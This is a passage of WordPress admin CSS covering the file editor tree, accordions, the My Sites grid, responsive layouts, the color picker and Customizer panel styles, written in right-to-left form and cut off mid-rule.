.toggle-indicator::before { width: 20px; border-radius: 50%; } .postbox .handlediv .toggle-indicator::before { position: relative; top: 0.05rem; text-indent: -1px; /* account for the dashicon glyph uneven horizontal alignment */ } .rtl .postbox .handlediv .toggle-indicator::before { text-indent: 1px; /* account for the dashicon glyph uneven horizontal alignment */ } .bulk-action-notice .toggle-indicator::before { line-height: 16px; vertical-align: top; color: #787c82; } .postbox .handle-order-higher:focus, .postbox .handle-order-lower:focus, .postbox .handlediv:focus { box-shadow: inset 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); border-radius: 50%; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .postbox .handle-order-higher:focus .order-higher-indicator::before, .postbox .handle-order-lower:focus .order-lower-indicator::before, .postbox .handlediv:focus .toggle-indicator::before { box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } /* @todo: appears to be Press This only and overridden */ #photo-add-url-div input[type="text"] { width: 300px; } /* Theme/Plugin file editor */ .alignleft h2 { margin: 0; } #template textarea { font-family: Consolas, Monaco, monospace; font-size: 13px; background: #f6f7f7; tab-size: 4; } #template textarea, #template .CodeMirror { width: 100%; min-height: 60vh; height: calc( 100vh - 295px ); border: 1px solid #dcdcde; box-sizing: border-box; } #templateside > h2 { padding-top: 6px; padding-bottom: 7px; margin: 0; } #templateside ol, #templateside ul { margin: 0; padding: 0; } #templateside > ul { box-sizing: border-box; margin-top: 0; overflow: auto; padding: 0; min-height: 60vh; height: calc(100vh - 295px); background-color: #f6f7f7; border: 1px solid #dcdcde; border-right: none; } #templateside ul ul { padding-right: 12px; } #templateside > ul > li > ul[role=group] { padding-right: 0; } /* * Styles for Theme and Plugin file editors. */ /* Hide collapsed items. */ [role="treeitem"][aria-expanded="false"] > ul { display: none; } /* Use arrow dashicons for folder states, but hide from screen readers. */ [role="treeitem"] span[aria-hidden] { display: inline; font-family: dashicons; font-size: 20px; position: absolute; pointer-events: none; } [role="treeitem"][aria-expanded="false"] > .folder-label .icon:after { content: "\f141"; content: "\f139" / ''; } [role="treeitem"][aria-expanded="true"] > .folder-label .icon:after { content: "\f140"; content: "\f140" / ''; } [role="treeitem"] .folder-label { display: block; padding: 3px 12px 3px 3px; cursor: pointer; } /* Remove outline, and create our own focus and hover styles */ [role="treeitem"] { outline: 0; } [role="treeitem"] a:focus, [role="treeitem"] .folder-label.focus { color: #043959; /* Reset default focus style. */ box-shadow: none; /* Use an inset outline instead, so it's visible also over the current file item. */ outline: 2px solid var(--wp-admin-theme-color, #3858e9); outline-offset: -2px; } [role="treeitem"].hover, [role="treeitem"] .folder-label.hover { background-color: #f0f0f1; } .tree-folder { margin: 0; position: relative; } [role="treeitem"] li { position: relative; } /* Styles for folder indicators/depth */ .tree-folder .tree-folder::after { content: ""; display: block; position: absolute; right: 2px; border-right: 1px solid #c3c4c7; top: -13px; bottom: 10px; } .tree-folder > li::before { content: ""; position: absolute; display: block; border-right: 1px solid #c3c4c7; right: 2px; top: -5px; height: 18px; width: 7px; border-bottom: 1px solid #c3c4c7; } .tree-folder > li::after { content: ""; position: absolute; display: block; border-right: 1px solid #c3c4c7; right: 2px; bottom: -7px; top: 0; } /* current-file needs to adjustment for .notice styles */ #templateside .current-file { margin: -4px 0 -2px; } .tree-folder > .current-file::before { right: 4px; height: 15px; width: 0; border-right: none; top: 3px; } .tree-folder > .current-file::after { bottom: -4px; height: 7px; right: 2px; top: auto; } /* Lines shouldn't continue on last item */ .tree-folder > li:last-child::after, .tree-folder li:last-child > .tree-folder::after { display: none; } #theme-plugin-editor-selector, #theme-plugin-editor-label, #documentation label { font-weight: 600; } #theme-plugin-editor-label { display: inline-block; margin-bottom: 1em; } /* rtl:ignore */ #template textarea, #docs-list { direction: ltr; } .fileedit-sub #theme, .fileedit-sub #plugin { max-width: 40%; } .fileedit-sub .alignright { text-align: left; } #template p { width: 97%; } #file-editor-linting-error { margin-top: 1em; margin-bottom: 1em; } #file-editor-linting-error > .notice { margin: 0; display: inline-block; } #file-editor-linting-error > .notice > p { width: auto; } #template .submit { margin-top: 1em; padding: 0; } #template .submit input[type=submit][disabled] { cursor: not-allowed; } #templateside { float: left; width: 16em; word-wrap: break-word; } #postcustomstuff p.submit { margin: 0; } #templateside h4 { margin: 1em 0 0; } #templateside li { margin: 4px 0; } #templateside li:not(.howto) a, .theme-editor-php .highlight { display: block; padding: 3px 12px 3px 0; text-decoration: none; } #templateside li.current-file > a { padding-bottom: 0; } #templateside li:not(.howto) > a:first-of-type { padding-top: 0; } #templateside li.howto { padding: 6px 12px 12px; } .theme-editor-php .highlight { margin: -3px -12px -3px 3px; } #templateside .highlight { border: none; font-weight: 600; } .nonessential { color: #646970; font-size: 11px; font-style: italic; padding-right: 12px; } #documentation { margin-top: 10px; } #documentation label { line-height: 1.8; vertical-align: baseline; } .fileedit-sub { padding: 10px 0 8px; line-height: 180%; } #file-editor-warning .file-editor-warning-content { margin: 25px; } /* @todo: can we use a common class for these? */ .nav-menus-php .item-edit:before, .wp-customizer .control-section .accordion-section-title:after, .wp-customizer .accordion-section-title:after, .widget-top .widget-action .toggle-indicator:before { content: "\f140"; content: "\f140" / ''; font: normal 20px/1 dashicons; display: block; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none; } .widget-top .widget-action .toggle-indicator:before { padding: 1px 0 1px 2px; border-radius: 50%; } .handlediv, .postbox .handlediv.button-link, .item-edit, .toggle-indicator { color: #646970; } .widget-action { color: #50575e; /* #fafafa background in the Widgets screen */ } .widget-top:hover .widget-action, .widget-action:focus, .handlediv:hover, .handlediv:focus, .postbox .handlediv.button-link:hover, .postbox .handlediv.button-link:focus, .item-edit:hover, .item-edit:focus, .sidebar-name:hover .toggle-indicator { color: #1d2327; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .widget-top .widget-action:focus .toggle-indicator:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #customize-info.open .accordion-section-title:after, .nav-menus-php .menu-item-edit-active .item-edit:before, .widget.open .widget-top .widget-action .toggle-indicator:before, .widget.widget-in-question .widget-top .widget-action .toggle-indicator:before { content: "\f142"; content: "\f142" / ''; } /*! * jQuery UI Draggable/Sortable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ .ui-draggable-handle, .ui-sortable-handle { touch-action: none; } /* Accordion */ .accordion-section { border-bottom: 1px solid #dcdcde; margin: 0; } .accordion-section.open .accordion-section-content, .no-js .accordion-section .accordion-section-content { display: block; } .accordion-section.open:hover { border-bottom-color: #dcdcde; } .accordion-section-content { display: none; padding: 10px 20px 15px; overflow: hidden; background: #fff; } .accordion-section-title { margin: 0; position: relative; border-right: 1px solid #dcdcde; border-left: 1px solid #dcdcde; -webkit-user-select: none; user-select: none; } .js .accordion-section-title { cursor: pointer; } .js .accordion-section-title:after { position: absolute; top: 12px; left: 10px; z-index: 1; } .accordion-section-title:focus { /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } .accordion-section-title:hover:after, .accordion-section-title:focus:after { border-color: #a7aaad transparent; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } .cannot-expand .accordion-section-title { cursor: auto; } .cannot-expand .accordion-section-title:after { display: none; } .control-section .accordion-section-title, .customize-pane-child .accordion-section-title { border-right: none; border-left: none; padding: 10px 14px 11px 10px; line-height: 1.55; background: #fff; } .control-section .accordion-section-title:after, .customize-pane-child .accordion-section-title:after { top: calc(50% - 10px); /* Arrow height is 20px, so use half of that to vertically center */ } .js .control-section:hover .accordion-section-title, .js .control-section .accordion-section-title:hover, .js .control-section.open .accordion-section-title, .js .control-section .accordion-section-title:focus { color: #1d2327; background: #f6f7f7; } .control-section.open .accordion-section-title { /* When expanded */ border-bottom: 1px solid #dcdcde; } /* Edit Site */ .network-admin .edit-site-actions { margin-top: 0; } /* My Sites */ .my-sites { display: block; overflow: auto; zoom: 1; } .my-sites li { display: block; padding: 8px 3%; min-height: 130px; margin: 0; } @media only screen and (max-width: 599px) { .my-sites li { min-height: 0; } } @media only screen and (min-width: 600px) { .my-sites.striped li { background-color: #fff; position: relative; } .my-sites.striped li:after { content: ""; width: 1px; height: 100%; position: absolute; top: 0; left: 0; background: #c3c4c7; } } @media only screen and (min-width: 600px) and (max-width: 699px) { .my-sites li{ float: right; width: 44%; } .my-sites.striped li { background-color: #fff; } .my-sites.striped li:nth-of-type(2n+1) { clear: right; } .my-sites.striped li:nth-of-type(2n+2):after { content: none; } .my-sites li:nth-of-type(4n+1), .my-sites li:nth-of-type(4n+2) { background-color: #f6f7f7; } } @media only screen and (min-width: 700px) and (max-width: 1199px) { .my-sites li { float: right; width: 27.333333%; background-color: #fff; } .my-sites.striped li:nth-of-type(3n+3):after { content: none; } .my-sites li:nth-of-type(6n+1), .my-sites li:nth-of-type(6n+2), .my-sites li:nth-of-type(6n+3) { background-color: #f6f7f7; } } @media only screen and (min-width: 1200px) and (max-width: 1399px) { .my-sites li { float: right; width: 21%; padding: 8px 2%; background-color: #fff; } .my-sites.striped li:nth-of-type(4n+1) { clear: right; } .my-sites.striped li:nth-of-type(4n+4):after { content: none; } .my-sites li:nth-of-type(8n+1), .my-sites li:nth-of-type(8n+2), .my-sites li:nth-of-type(8n+3), .my-sites li:nth-of-type(8n+4) { background-color: #f6f7f7; } } @media only screen and (min-width: 1400px) and (max-width: 1599px) { .my-sites li { float: right; width: 16%; padding: 8px 2%; background-color: #fff; } .my-sites.striped li:nth-of-type(5n+1) { clear: right; } .my-sites.striped li:nth-of-type(5n+5):after { content: none; } .my-sites li:nth-of-type(10n+1), .my-sites li:nth-of-type(10n+2), .my-sites li:nth-of-type(10n+3), .my-sites li:nth-of-type(10n+4), .my-sites li:nth-of-type(10n+5) { background-color: #f6f7f7; } } @media only screen and (min-width: 1600px) { .my-sites li { float: right; width: 12.666666%; padding: 8px 2%; background-color: #fff; } .my-sites.striped li:nth-of-type(6n+1) { clear: right; } .my-sites.striped li:nth-of-type(6n+6):after { content: none; } .my-sites li:nth-of-type(12n+1), .my-sites li:nth-of-type(12n+2), .my-sites li:nth-of-type(12n+3), .my-sites li:nth-of-type(12n+4), .my-sites li:nth-of-type(12n+5), .my-sites li:nth-of-type(12n+6) { background-color: #f6f7f7; } } .my-sites li a { text-decoration: none; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { /* Back-compat for pre-3.8 */ div.star-holder, div.star-holder .star-rating { background: url(../images/stars-2x.png?ver=20121108) repeat-x bottom right; background-size: 21px 37px; } .spinner { background-image: url(../images/spinner-2x.gif); } } @media screen and (max-width: 782px) { html.wp-toolbar { padding-top: var(--wp-admin--admin-bar--height); } .screen-reader-shortcut:focus { top: -39px; } .block-editor-page .screen-reader-shortcut:focus { top: 7px; } .screen-reader-shortcut[href="#wp-toolbar"] { display: none; } body { min-width: 240px; overflow-x: hidden; } body * { -webkit-tap-highlight-color: rgba(0, 0, 0, 0) !important; } #wpcontent { position: relative; margin-right: 0; padding-right: 10px; } #wpbody-content { padding-bottom: 100px; } .wrap { clear: both; margin-left: 12px; margin-right: 0; } /* categories */ #col-left, #col-right { float: none; width: auto; } #col-left .col-wrap, #col-right .col-wrap { padding: 0; } /* Hidden Elements */ #collapse-menu, .post-format-select { display: none !important; } .wrap h1.wp-heading-inline { margin-bottom: 0.5em; } .wrap .add-new-h2, /* deprecated */ .wrap .add-new-h2:active, /* deprecated */ .wrap .page-title-action, .wrap .page-title-action:active { padding: 0 14px; font-size: 14px; white-space: nowrap; min-height: 40px; line-height: 2.71428571; vertical-align: middle; } /* Feedback Messages */ .notice, .wrap div.updated, .wrap div.error, .media-upload-form div.error { margin: 20px 0 10px; padding: 5px 10px; font-size: 14px; line-height: 175%; } .wp-core-ui .notice.is-dismissible { padding-left: 46px; } .notice-dismiss { padding: 13px; } .wrap .icon32 + h2 { margin-top: -2px; } .wp-responsive-open #wpbody { left: -16em; } code { word-wrap: break-word; word-wrap: anywhere; /* Firefox. Allow breaking long words anywhere */ word-break: break-word; /* Webkit: Treated similarly to word-wrap: break-word */ } /* General Metabox */ .postbox { font-size: 14px; } .metabox-holder h3.hndle, /* Back-compat for pre-4.4 */ .metabox-holder .stuffbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder .postbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder h2 { padding: 12px; } .nav-menus-php .metabox-holder h3 { padding: 0; } .postbox .handlediv { margin-top: 3px; } /* Subsubsub Nav */ .subsubsub { font-size: 16px; text-align: center; margin-bottom: 15px; } /* Theme/Plugin File Editor */ #template textarea, #template .CodeMirror { box-sizing: border-box; } #templateside { float: none; width: auto; } #templateside > ul { border-right: 1px solid #dcdcde; } #templateside li { margin: 0; } #templateside li:not(.howto) a { display: block; padding: 5px; } #templateside li.howto { padding: 12px; } #templateside .highlight { padding: 5px; margin-right: -5px; margin-top: -5px; } #template > div, #template .notice { float: none; margin: 1em 0; width: auto; } #template .CodeMirror, #template textarea { width: 100%; } #templateside ul ul { padding-right: 1.5em; } [role="treeitem"] .folder-label { display: block; padding: 5px; } .tree-folder > li::before, .tree-folder > li::after, .tree-folder .tree-folder::after { right: -8px; } .tree-folder > li::before { top: 0; height: 13px; } .tree-folder > .current-file::before { right: -5px; top: 7px; width: 4px; } .tree-folder > .current-file::after { height: 9px; right: -8px; } .wrap #templateside span.notice { margin-right: -5px; width: 100%; } .fileedit-sub .alignright { float: right; margin-top: 15px; width: 100%; text-align: right; } .fileedit-sub .alignright label { display: block; } .fileedit-sub #theme, .fileedit-sub #plugin { margin-right: 0; max-width: 70%; } .fileedit-sub input[type="submit"] { margin-bottom: 0; } #documentation label[for="docs-list"] { display: block; } #documentation select[name="docs-list"] { margin-right: 0; max-width: 60%; } #documentation input[type="button"] { margin-bottom: 0; } #wpfooter { display: none; } #comments-form .checkforspam { display: none; } .edit-comment-author { margin: 2px 0 0; } .filter-drawer .filter-group-feature input, .filter-drawer .filter-group-feature label { line-height: 2.1; } .filter-drawer .filter-group-feature label { margin-right: 32px; } .wp-filter .button.drawer-toggle { font-size: 13px; line-height: 2; height: 28px; } /* Fix help tab columns for smaller screens */ #screen-meta #contextual-help-wrap { overflow: visible; } #screen-meta #contextual-help-back, #screen-meta .contextual-help-sidebar { display: none; } #screen-meta .contextual-help-tabs { clear: both; width: 100%; float: none; } #screen-meta .contextual-help-tabs ul { margin: 0 0 1em; padding: 1em 0 0; } #screen-meta .contextual-help-tabs .active { margin: 0; } #screen-meta .contextual-help-tabs-wrap { clear: both; max-width: 100%; float: none; } #screen-meta, #screen-meta-links { margin-left: 10px; } #screen-meta-links { margin-bottom: 20px; /* Add margins beneath links for better spacing between boxes and elements */ } #screen-meta-links .show-settings:after { line-height: 1.9; } .wp-filter .search-form input[type="search"] { font-size: 1rem; } .wp-filter .search-form.search-plugins { /* This element is a flex item. */ min-width: 100%; } } /* Smartphone */ @media screen and (max-width: 600px) { /* Disable horizontal scroll when responsive menu is open since we push the main content off to the right. */ #wpwrap.wp-responsive-open { overflow-x: hidden; } html.wp-toolbar { padding-top: 0; } .screen-reader-shortcut:focus { top: 7px; } #wpbody { padding-top: 46px; } /* Keep full-width boxes on Edit Post page from causing horizontal scroll */ div#post-body.metabox-holder.columns-1 { overflow-x: hidden; } h1.nav-tab-wrapper, .wrap h2.nav-tab-wrapper, .nav-tab-wrapper { border-bottom: 0; } h1 .nav-tab, h2 .nav-tab, h3 .nav-tab, nav .nav-tab { margin: 10px 0 0 10px; border-bottom: 1px solid #c3c4c7; } .nav-tab-active:hover, .nav-tab-active:focus, .nav-tab-active:focus:active { border-bottom: 1px solid #c3c4c7; } .wp-filter .search-form.search-plugins label { width: 100%; } } @media screen and (max-width: 480px) { .metabox-prefs-container { display: grid; } .metabox-prefs-container > * { display: inline-block; padding: 2px; } } @media screen and (max-width: 320px) { /* Prevent default center alignment and larger font for the Right Now widget when the network dashboard is viewed on a small mobile device. */ #network_dashboard_right_now .subsubsub { font-size: 14px; text-align: right; } } /*! This file is auto-generated */ .farbtastic{position:relative}.farbtastic *{position:absolute;cursor:crosshair}.farbtastic,.farbtastic .wheel{width:195px;height:195px}.farbtastic .color,.farbtastic .overlay{top:47px;right:47px;width:101px;height:101px}.farbtastic .wheel{background:url(../images/wheel.png) no-repeat;width:195px;height:195px}.farbtastic .overlay{background:url(../images/mask.png) no-repeat}.farbtastic .marker{width:17px;height:17px;margin:-8px -8px 0 0;overflow:hidden;background:url(../images/marker.png) no-repeat}/*! This file is auto-generated */ body{overflow:hidden;-webkit-text-size-adjust:100%}.customize-controls-close,.widget-control-actions a{text-decoration:none}#customize-controls h3{font-size:14px}#customize-controls img{max-width:100%}#customize-controls .submit{text-align:center}#customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked{background-color:rgba(0,0,0,.7);padding:25px}#customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .customize-changeset-locked-message{margin-left:auto;margin-right:auto;max-width:366px;min-height:64px;width:auto;padding:25px;position:relative;background:#fff;box-shadow:0 3px 6px rgba(0,0,0,.3);line-height:1.5;overflow-y:auto;text-align:left;top:calc(50% - 100px)}#customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .customize-changeset-locked-message.has-avatar{padding-left:109px}#customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .currently-editing{margin-top:0}#customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .action-buttons{margin-bottom:0}.customize-changeset-locked-avatar{width:64px;position:absolute;left:25px;top:25px}.wp-core-ui.wp-customizer .customize-changeset-locked-message a.button{margin-right:10px;margin-top:0}#customize-controls .description{color:#50575e}#customize-save-button-wrapper{float:right;margin-top:7px}body:not(.ready) #customize-save-button-wrapper .save{visibility:hidden}#customize-save-button-wrapper .save{float:left;border-radius:3px;box-shadow:none;margin-top:0}#customize-save-button-wrapper .save.has-next-sibling{border-radius:3px 0 0 3px}#customize-sidebar-outer-content{position:absolute;top:0;bottom:0;left:0;visibility:hidden;overflow-x:hidden;overflow-y:auto;width:100%;margin:0;z-index:-1;background:#f0f0f1;transition:left .18s;border-right:1px solid #dcdcde;border-left:1px solid #dcdcde;height:100%}@media (prefers-reduced-motion:reduce){#customize-sidebar-outer-content{transition:none}}#customize-theme-controls .control-section-outer{display:none!important}#customize-outer-theme-controls .accordion-section-content{padding:12px}#customize-outer-theme-controls .accordion-section-content.open{display:block}.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content{visibility:visible;left:100%;transition:left .18s}@media (prefers-reduced-motion:reduce){.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content{transition:none}}.customize-outer-pane-parent{margin:0}.outer-section-open .wp-full-overlay.expanded .wp-full-overlay-main{left:300px;opacity:.4}.adding-menu-items .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main,.adding-menu-items .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main,.adding-widget .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main,.adding-widget .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main,.outer-section-open .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main,.outer-section-open .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main{left:64%}#customize-outer-theme-controls li.notice{padding-top:8px;padding-bottom:8px;margin-left:0;margin-bottom:10px}#publish-settings{text-indent:0;border-radius:0 3px 3px 0;padding-left:0;padding-right:0;box-shadow:none;font-size:14px;width:30px;float:left;transform:none;margin-top:0;line-height:2}body.trashing #customize-save-button-wrapper .save,body.trashing #publish-settings,body:not(.ready) #publish-settings{display:none}#customize-header-actions .spinner{margin-top:13px;margin-right:4px}.saving #customize-header-actions .spinner,.trashing #customize-header-actions .spinner{visibility:visible}#customize-header-actions{border-bottom:1px solid #dcdcde}#customize-controls .wp-full-overlay-sidebar-content{overflow-y:auto;overflow-x:hidden}.outer-section-open #customize-controls .wp-full-overlay-sidebar-content{background:#f0f0f1}#customize-controls .customize-info{border:none;border-bottom:1px solid #dcdcde;margin-bottom:15px}#customize-control-changeset_preview_link input,#customize-control-changeset_status .customize-inside-control-row{background-color:#fff;border-bottom:1px solid #dcdcde;box-sizing:content-box;width:100%;margin-left:-12px;padding-left:12px;padding-right:12px}#customize-control-trash_changeset{margin-top:20px}#customize-control-trash_changeset .button-link{position:relative;padding-left:24px;display:inline-block}#customize-control-trash_changeset .button-link:before{content:"\f182";content:"\f182"/'';font:normal 22px dashicons;text-decoration:none;position:absolute;left:0;top:-2px}#customize-controls .date-input:invalid{border-color:#d63638}#customize-control-changeset_status .customize-inside-control-row{padding-top:10px;padding-bottom:10px;font-weight:500}#customize-control-changeset_status .customize-inside-control-row:first-of-type{border-top:1px solid #dcdcde}#customize-control-changeset_status .customize-control-title{margin-bottom:6px}#customize-control-changeset_status input{margin-left:0}#customize-control-changeset_preview_link{position:relative;display:block}.preview-link-wrapper .customize-copy-preview-link.preview-control-element.button{margin:0;position:absolute;top:50%;transform:translateY(-50%)!important;right:0;background:#fff!important}.preview-link-wrapper{position:relative}.customize-copy-preview-link:after,.customize-copy-preview-link:before{content:"";height:40px;position:absolute;background:#fff;top:0}.customize-copy-preview-link:before{left:-10px;width:9px;opacity:.75}.customize-copy-preview-link:after{left:-5px;width:4px;opacity:.8}#customize-control-changeset_preview_link input{line-height:2.85714286;border-top:1px solid #dcdcde;border-left:none;border-right:none;text-indent:-999px;color:#fff;min-height:40px}#customize-control-changeset_preview_link label{position:relative;display:block}#customize-control-changeset_preview_link a{display:inline-block;position:absolute;white-space:nowrap;overflow:hidden;width:90%;bottom:14px;font-size:14px;text-decoration:none}#customize-control-changeset_preview_link a.disabled,#customize-control-changeset_preview_link a.disabled:active,#customize-control-changeset_preview_link a.disabled:focus,#customize-control-changeset_preview_link a.disabled:visited{color:#000;opacity:.4;cursor:default;outline:0;box-shadow:none}#sub-accordion-section-publish_settings .customize-section-description-container{display:none}#customize-controls .customize-info.section-meta{margin-bottom:15px}.customize-control-date_time .customize-control-description+.date-time-fields.includes-time{margin-top:10px}.customize-control.customize-control-date_time .date-time-fields .date-input.day{margin-right:0}.date-time-fields .date-input.month{width:auto;margin:0}.date-time-fields .date-input.day,.date-time-fields .date-input.hour,.date-time-fields .date-input.minute{width:46px}.customize-control-date_time select{vertical-align:top}.date-time-fields .date-input.year{width:65px}.date-time-fields .date-input.meridian{width:auto;margin:0}.date-time-fields .time-row{margin-top:12px}#customize-control-changeset_preview_link{margin-top:6px}#customize-control-changeset_status{margin-bottom:0;padding-bottom:0}#customize-control-changeset_scheduled_date{box-sizing:content-box;width:100%;margin-left:-12px;padding:12px;background:#fff;border-bottom:1px solid #dcdcde;margin-bottom:0}#customize-control-changeset_scheduled_date .customize-control-description,#customize-control-site_icon .customize-control-description{font-style:normal}#customize-controls .customize-info.is-in-view,#customize-controls .customize-section-title.is-in-view{position:absolute;z-index:9;width:100%;box-shadow:0 1px 0 rgba(0,0,0,.1)}#customize-controls .customize-section-title.is-in-view{margin-top:0}#customize-controls .customize-info.is-in-view+.accordion-section{margin-top:15px}#customize-controls .customize-info.is-sticky,#customize-controls .customize-section-title.is-sticky{position:fixed;top:46px}#customize-controls .customize-info .accordion-section-title{background:#fff;color:#50575e;border-left:none;border-right:none;border-bottom:none;cursor:default;padding:10px 10px 11px 14px}#customize-controls .customize-info .accordion-section-title:focus:after,#customize-controls .customize-info .accordion-section-title:hover:after,#customize-controls .customize-info.open .accordion-section-title:after{color:#2c3338}#customize-controls .customize-info .accordion-section-title:after{display:none}#customize-controls .customize-info .preview-notice{font-size:13px;line-height:1.9;margin:0;font-weight:400;color:#50575e}#customize-controls .customize-info .panel-title,#customize-controls .customize-pane-child .customize-section-title h3,#customize-controls .customize-pane-child h3.customize-section-title,#customize-outer-theme-controls .customize-pane-child .customize-section-title h3,#customize-outer-theme-controls .customize-pane-child h3.customize-section-title{font-size:20px;font-weight:200;line-height:26px;display:block;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}#customize-controls .customize-section-title span.customize-action{overflow:hidden;white-space:nowrap;text-overflow:ellipsis}#customize-controls .customize-info .customize-help-toggle{position:absolute;top:4px;right:1px;padding:20px 20px 10px 10px;width:20px;height:20px;cursor:pointer;box-shadow:none;background:0 0;color:#50575e;border:none}#customize-controls .customize-info .customize-help-toggle:before{position:absolute;top:5px;left:6px}#customize-controls .customize-info .customize-panel-description,#customize-controls .customize-info .customize-section-description,#customize-controls .no-widget-areas-rendered-notice,#customize-outer-theme-controls .customize-info .customize-section-description{color:#50575e;display:none;background:#fff;padding:12px 15px;border-top:1px solid #dcdcde}#customize-controls .customize-info .customize-panel-description.open+.no-widget-areas-rendered-notice{border-top:none}.no-widget-areas-rendered-notice{font-style:italic}.no-widget-areas-rendered-notice p:first-child{margin-top:0}.no-widget-areas-rendered-notice p:last-child{margin-bottom:0}#customize-controls .customize-info .customize-section-description{margin-bottom:15px}#customize-controls .customize-info .customize-panel-description p:first-child,#customize-controls .customize-info .customize-section-description p:first-child{margin-top:0}#customize-controls .customize-info .customize-panel-description p:last-child,#customize-controls .customize-info .customize-section-description p:last-child{margin-bottom:0}#customize-controls .current-panel .control-section>h3.accordion-section-title{padding-right:30px}#customize-outer-theme-controls .control-section,#customize-theme-controls .control-section{border:none}#customize-outer-theme-controls .accordion-section-title,#customize-theme-controls .accordion-section-title{color:#50575e;background-color:#fff;border-bottom:1px solid #dcdcde;border-left:4px solid #fff;transition:.15s color ease-in-out,.15s background-color ease-in-out,.15s border-color ease-in-out}#customize-controls .current-panel .control-section>h3.accordion-section-title:has(button.accordion-trigger),.accordion-section-title:has(button.accordion-trigger){padding:0}.accordion-section-title button.accordion-trigger{all:unset;width:100%;padding:10px 30px 11px 14px;display:flex;align-items:center;box-sizing:border-box}.accordion-section-title button.accordion-trigger:has(.menu-in-location){display:block}.accordion-section-title button.accordion-trigger .spinner{margin-top:0}@media (prefers-reduced-motion:reduce){#customize-outer-theme-controls .accordion-section-title,#customize-theme-controls .accordion-section-title{transition:none}}#customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title{color:#50575e;background-color:#fff;border-left:4px solid #fff}#customize-outer-theme-controls .accordion-section-title:after,#customize-theme-controls .accordion-section-title:after{content:"\f345";content:"\f345"/'';color:#a7aaad;pointer-events:none}#customize-outer-theme-controls .accordion-section-content,#customize-theme-controls .accordion-section-content{color:#50575e;background:0 0}#accordion-section-themes+.control-section{border-top:1px solid #dcdcde}.js .control-section .accordion-section-title:focus,.js .control-section .accordion-section-title:hover,.js .control-section.open .accordion-section-title,.js .control-section:hover .accordion-section-title{background:#f6f7f7}#customize-theme-controls .control-section.open{border-bottom:1px solid #f0f0f1}#customize-outer-theme-controls .control-section.open .accordion-section-title,#customize-theme-controls .control-section.open .accordion-section-title{border-bottom-color:#f0f0f1!important}#customize-theme-controls .control-section:last-of-type.open,#customize-theme-controls .control-section:last-of-type>.accordion-section-title{border-bottom-color:#dcdcde}#customize-theme-controls .control-panel-content:not(.control-panel-nav_menus) .control-section:nth-child(2),#customize-theme-controls .control-panel-nav_menus .control-section-nav_menu,#customize-theme-controls .control-section-nav_menu_locations .accordion-section-title{border-top:1px solid #dcdcde}#customize-theme-controls .control-panel-nav_menus .control-section-nav_menu+.control-section-nav_menu{border-top:none}#customize-theme-controls>ul{margin:0}#customize-theme-controls .accordion-section-content{position:absolute;top:0;left:100%;width:100%;margin:0;padding:12px;box-sizing:border-box}#customize-info,#customize-theme-controls .customize-pane-child,#customize-theme-controls .customize-pane-parent{overflow:visible;width:100%;margin:0;padding:0;box-sizing:border-box;transition:.18s transform cubic-bezier(.645, .045, .355, 1)}@media (prefers-reduced-motion:reduce){#customize-info,#customize-theme-controls .customize-pane-child,#customize-theme-controls .customize-pane-parent{transition:none}}#customize-theme-controls .customize-pane-child.skip-transition{transition:none}#customize-info,#customize-theme-controls .customize-pane-parent{position:relative;visibility:visible;height:auto;max-height:none;overflow:auto;transform:none}#customize-theme-controls .customize-pane-child{position:absolute;top:0;left:0;visibility:hidden;height:0;max-height:none;overflow:hidden;transform:translateX(100%)}#customize-theme-controls .customize-pane-child.current-panel,#customize-theme-controls .customize-pane-child.open{transform:none}.in-sub-panel #customize-info,.in-sub-panel #customize-theme-controls .customize-pane-parent,.in-sub-panel.section-open #customize-theme-controls .customize-pane-child.current-panel,.section-open #customize-info,.section-open #customize-theme-controls .customize-pane-parent{visibility:hidden;height:0;overflow:hidden;transform:translateX(-100%)}#customize-theme-controls .customize-pane-child.busy,#customize-theme-controls .customize-pane-child.current-panel,#customize-theme-controls .customize-pane-child.open,.busy.section-open.in-sub-panel #customize-theme-controls .customize-pane-child.current-panel,.in-sub-panel #customize-info.busy,.in-sub-panel #customize-theme-controls .customize-pane-parent.busy,.section-open #customize-info.busy,.section-open #customize-theme-controls .customize-pane-parent.busy{visibility:visible;height:auto;overflow:auto}#customize-theme-controls .customize-pane-child.accordion-section-content,#customize-theme-controls .customize-pane-child.accordion-sub-container{display:block;overflow-x:hidden}#customize-theme-controls .customize-pane-child.accordion-section-content{padding:12px}#customize-theme-controls .customize-pane-child.menu li{position:static}.control-section-nav_menu .customize-section-description-container,.control-section-new_menu .customize-section-description-container,.customize-section-description-container{margin-bottom:15px}.control-section-nav_menu .customize-control,.control-section-new_menu .customize-control{margin-bottom:0}.customize-section-title{margin:-12px -12px 0;border-bottom:1px solid #dcdcde;background:#fff}div.customize-section-description{margin-top:22px}.customize-info div.customize-section-description{margin-top:0}div.customize-section-description p:first-child{margin-top:0}div.customize-section-description 